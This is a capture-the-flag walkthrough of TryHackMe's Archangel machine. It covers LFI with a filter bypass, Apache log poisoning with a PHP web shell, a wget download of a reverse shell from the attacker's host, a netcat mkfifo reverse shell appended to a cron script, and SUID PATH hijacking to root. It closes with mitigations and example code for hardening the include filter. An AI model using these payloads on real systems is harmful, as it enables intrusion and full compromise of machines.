Archangel Write-up

Description
Archangel is a boot2root CTF on TryHackMe. A well known security solutions company seems to be doing some testing on their live machine. Best time to exploit it.
Enumeration
First of all, we have to determine which services are running on the target machine. For this reason we start an Nmap scan with the following command: sudo nmap -p- $TARGET_IP
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-17 15:53 EST
Nmap scan report for localhost ($TARGET_IP)
Host is up (0.080s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 116.07 seconds
As you can see, the target is running SSH on port 22 and a web server on port 80. We can now check out the website.

On the website we can check the HTTP headers. Just open the developer console and navigate to the “Network” tab. The “Server” response header tells us that Apache 2.4.29 is running and that the target is an Ubuntu machine.

The website also reveals a domain for the server: it is the domain part of the e-mail address shown on the page.

You can now add that domain to your /etc/hosts file. Afterwards you should be able to navigate to that domain. You will see an “under development” page and the first flag.

Next we can check whether a “robots.txt” file exists. Luckily for us there is one, and it contains the path “/test.php”.

On the “/test.php” path there is a button. This button includes another page.

Clicking that button shows new text, and the URL changes to carry a parameter.

We can now test for an LFI vulnerability. The parameter “view” is prone to LFI. Using the php://filter wrapper we can read the source code of the “test.php” file itself:
http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php

This returns the source code of “test.php” as base64-encoded data. We can easily decode it with CyberChef or with bash and the command echo <source code> | base64 -d > test.php. You can now open the file in a text editor. This reveals the filter and another flag.

We can easily bypass that filter by using “.././..” instead of “../..”, since the filter only checks for the literal “../..” sequence. The following URL bypasses the filter and displays the “/etc/passwd” file:
http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././../etc/passwd

We can also test whether the Apache access log is readable through the same path. The following URL returns it successfully:
http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././../var/log/apache2/access.log
Initial Access
With that knowledge we can now perform log poisoning to get a reverse shell. Start Burp Suite and intercept a request. Place the PHP command <?php system($_GET['cmd']); ?> inside the “User-Agent” field.

Now we can inject shell commands and get their output inside the access log. An example request for the id command:
http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././../var/log/apache2/access.log&cmd=id

We can now use this simple web shell to upload a reverse shell. I have used the PHP reverse shell of Pentestmonkey. Host a web server with that shell on your machine and inject a wget command to download the reverse shell.
http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././../var/log/apache2/access.log&cmd=wget%20http://$YOUR_IP_AND_PORT/s.php
After starting a netcat listener on your host with the command nc -lvnp 1234, you can navigate to the URL http://mafialive.thm/test.php?view=/var/www/html/development_testing/s.php and get a reverse shell.
listening on [any] 1234 ...
Linux ubuntu 4.15.0-123-generic #126-Ubuntu SMP Wed Oct 21 09:40:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
03:27:09 up 1:06, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Next drop into a TTY shell with the following Python command:
python3 -c "import pty; pty.spawn('/bin/bash')"
Finally you can read the user flag with the command cat /home/archangel/user.txt.
Enumeration
During enumeration of the box we can spot that the archangel user is running a cronjob every minute.

The “helloworld.sh” script executed by that cronjob is writable by our www-data user.

Privilege Escalation to the archangel user
Now we can again start a netcat listener on the attacker machine. After that we append a netcat reverse shell to the “helloworld.sh” script to gain a shell as archangel the next time the cronjob fires.
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $MACHINE_IP 1234 >/tmp/f" >> helloworld.sh

Now we can read the second flag, which is placed inside the “secret” directory of the archangel user.

Inside the “secret” directory there is a binary called “backup”. This binary has the SUID bit set. Running strings against the binary reveals that it runs cp /home/user/archangel/myfiles/* /opt/backupfiles, calling cp without an absolute path.
Privilege Escalation to root
The “backup” binary can be abused to escalate our privileges, because it resolves cp through the “PATH” variable. Run the following commands. Create a file called “cp” with touch cp. Next run the following commands to make it run bash:
echo '#!/bin/bash' >> cp
echo '/bin/bash' >> cp
After that change your “PATH” variable so that the current folder comes first.
export PATH="/home/archangel/secret:$PATH"
Finally you can run the “backup” binary: ./backup. After running the “backup” binary we should be root and able to read the root flag.

Mitigation
Never deploy anything that is under development on a live machine. The include filter in “test.php” should also be hardened: a substring check for “../..” is not enough, the included path has to be normalised and restricted to an allowed directory. Furthermore, the “helloworld.sh” script should only be writable by its owner. The backup binary should call cp by its absolute path instead of relying on the “PATH” variable.
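As an added illustration of the filter mitigation (this is not the room's own test.php, and BASE_DIR as well as the page name page2.php are assumptions), the following Python compares a substring filter of the kind bypassed above with a normalise-and-allowlist check, run over the three inputs from this write-up:

```python
import posixpath

# Assumed include directory, taken from the paths in the write-up's URLs.
BASE_DIR = "/var/www/html/development_testing"


def naive_filter(view: str) -> bool:
    """Substring check in the spirit of the original test.php: only the literal
    '../..' sequence is rejected. Returns True when the request would be served."""
    return "../.." not in view


def resolve_view(view: str):
    """Hardened replacement. Returns the absolute file to include, or None.

    1. Reject stream wrappers (php://, data://, ...) so the filter wrapper trick
       for leaking source code no longer works.
    2. Normalise the path lexically, which collapses every '.' and '..' segment,
       including the '.././..' spelling that slips past the substring check.
    3. Require the normalised path to stay inside BASE_DIR and to be a .php file.
    In a real deployment, resolve symlinks with realpath() as well.
    """
    if "://" in view or "\0" in view:
        return None
    # join() keeps an absolute 'view' as-is and prefixes a relative one with BASE_DIR
    candidate = posixpath.normpath(posixpath.join(BASE_DIR, view))
    if not candidate.startswith(BASE_DIR + "/"):
        return None
    if not candidate.endswith(".php"):
        return None
    return candidate


# Constructed requests: a legitimate page (assumed name) and the three inputs
# from the write-up.
REQUESTS = [
    "page2.php",
    "php://filter/convert.base64-encode/resource=" + BASE_DIR + "/test.php",
    BASE_DIR + "/.././.././.././../etc/passwd",
    BASE_DIR + "/.././.././.././../var/log/apache2/access.log",
]

if __name__ == "__main__":
    for req in REQUESTS:
        print(f"{req}\n  naive: {'allow' if naive_filter(req) else 'block'}"
              f"  hardened: {resolve_view(req) or 'block'}")
```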